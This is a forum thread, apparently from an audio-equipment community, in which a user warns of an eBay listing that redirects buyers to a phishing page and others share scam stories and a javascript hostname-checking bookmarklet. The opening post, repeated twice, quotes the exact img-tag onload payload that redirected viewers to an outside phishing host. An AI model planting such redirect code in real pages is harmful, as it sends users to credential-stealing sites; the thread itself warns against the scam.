Scamming Ebay Ratbastards from Hell
polksda
Posts: 716
These slimeballs are good.... really good.
Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).
Being curious, I clicked on the auction link and ended up at the page below:
Now, this took me aback for a second, and then I saw the URL in the address bar.
The **** have programmed a redirect into their auction text.
I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:
<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html">
Hopefully Ebay will implement some parsing to eliminate this loophole.
Be careful out there folks...
[And yes, I reported it to Ebay immediately]
Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).
Being curious, I clicked on the auction link and ended up at the page below:
Now, this took me aback for a second, and then I saw the URL in the address bar.
The **** have programmed a redirect into their auction text.
I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:
<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html">
Hopefully Ebay will implement some parsing to eliminate this loophole.
Be careful out there folks...
[And yes, I reported it to Ebay immediately]
Post edited by RyanC_Masimo on
Comments
-
Wow. That's actually pretty smart on their part. I hope they get caught.Sharp Elite 70
Anthem D2V 3D
Parasound 5250
Parasound HCA 1000 A
Parasound HCA 1000
Oppo BDP 95
Von Schweikert VR4 Jr R/L Fronts
Von Schweikert LCR 4 Center
Totem Mask Surrounds X4
Hsu ULS-15 Quad Drive Subwoofers
Sony PS3
Squeezebox Touch
Polk Atrium 7s on the patio just to keep my foot in the door. -
Have fun in prison ****.
-
i've never actually seen phishing in action... thanks for the tip!It's not good, very fundamentally simply not good. - geolemon
"Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs -
Shizelbs wrote:Have fun in prison ****.
I doubt that anyone will be caught, let alone be punished.
If you look at the URL, it's hosted at 50megs.com, a free hosting site. These **** set up an account, use it to glean information until the account is shut down, then they move on to another host.
I've reported email-based phishing scams to several free hosts out there that have been hosting these criminals, and the free hosts don't care. I suspect that some of the free hosts (or staff members) are in cahoots, given the lack of action... -
Email based phishing is one thing. Actually hosting it on eBay's site might piss them off to make them pursue it. How far they'll get is another story, but technically they coudl get the FBI involved.If you will it, dude, it is no dream.
-
polksda wrote:I doubt that anyone will be caught, let alone be punished.
I doubt it also, but you never know. I certainly hope so though. -
Forgive my obtuseness, but is the scam where you click on the auction and are directed to their phony login screen and when you try to log in they have your name and password?polkaudio sound quality competitor since 2005
MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st
polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D -
EDIT: That's pretty much it, Mac...
Love how the scammers never have learned how to spell...
Anyone else been getting those "ebay" phish-mails that look like an ebay message and start with something along the lines of:
"I need to hear from you about the 'such and such' that I won in your auction #123456."More later,
Tour...
Vox Copuli
Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb
"Death doesn't come with a Uhaul." - Dennis Gardner
"It's easy to get lost in price vs performance vs ego vs illusion." - doro
"There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD -
Yikes!
Ive had one of those only once so far back when I was on AOL a couple years ago. I got an email telling me my AOL account was about to be canceled due to a credit card being declined and I had to re-enter all my stats. The link took me to a website that looked identical to AOL's and asked for passwords, credit card numbers and the whole shebang!
I didnt trust it so I called AOL and asked them and she said it was definitely a scam and got all the info and said their security department would look into it.
It looks like their getting better with these scams. I wonder how many poor saps got suckered into this one?polkaudio sound quality competitor since 2005
MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st
polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D -
If you have any doubts, change your passwords to make things hard for them. Stay ahead of them and watch the URL's.>
>
>This message has been scanned by the NSA and found to be free of harmful intent.< -
even the URLs aren't a sure thing, unfortunately... a clever programmer can hide those, too, which is really frightening...
i personally have all my websites remember me with a cookie (with appropriate security settings, naturally)... that way, it logs me in automatically, and if i see another login screen after that it makes me suspicious by default...It's not good, very fundamentally simply not good. - geolemon
"Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs -
The sad part is, it was probably done from an internet cafe via proxy.
It's a bold scam and a reminder not to surf the internet high. -
I keep this as a notepad file on my desktop. Just open the file and copy and past this text in the url box to confirm the actual site.
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");I remember when 'broadband' meant The Go-Go's. -
thats a great little piece of code! thanks!
-
That is pretty cool... I wonder why ebay and others sites that are heavily spoofed don't advertise this code's existence?
On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that...More later,
Tour...
Vox Copuli
Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb
"Death doesn't come with a Uhaul." - Dennis Gardner
"It's easy to get lost in price vs performance vs ego vs illusion." - doro
"There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD -
Tour2ma wrote:On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that...
It's just the root (the www.polkaudio.com part) that is supposed to be compared... I get that being the same... so Polk isn't a possible spoof. It's just checking the host name, not the entire URL.If you will it, dude, it is no dream. -
These kind of people really get under my skin......Alpine: CDA-7949
Alpine: PXA-H600
Alpine: CHA-S624, KCA-420i, KCA-410C
Rainbow: CS 265 Profi Phase Plug / SL 165
ARC Audio: 4150-XXK / 1500v1-XXK
JL Audio: 10W6v2 (x2)
KnuKonceptz
Second Skin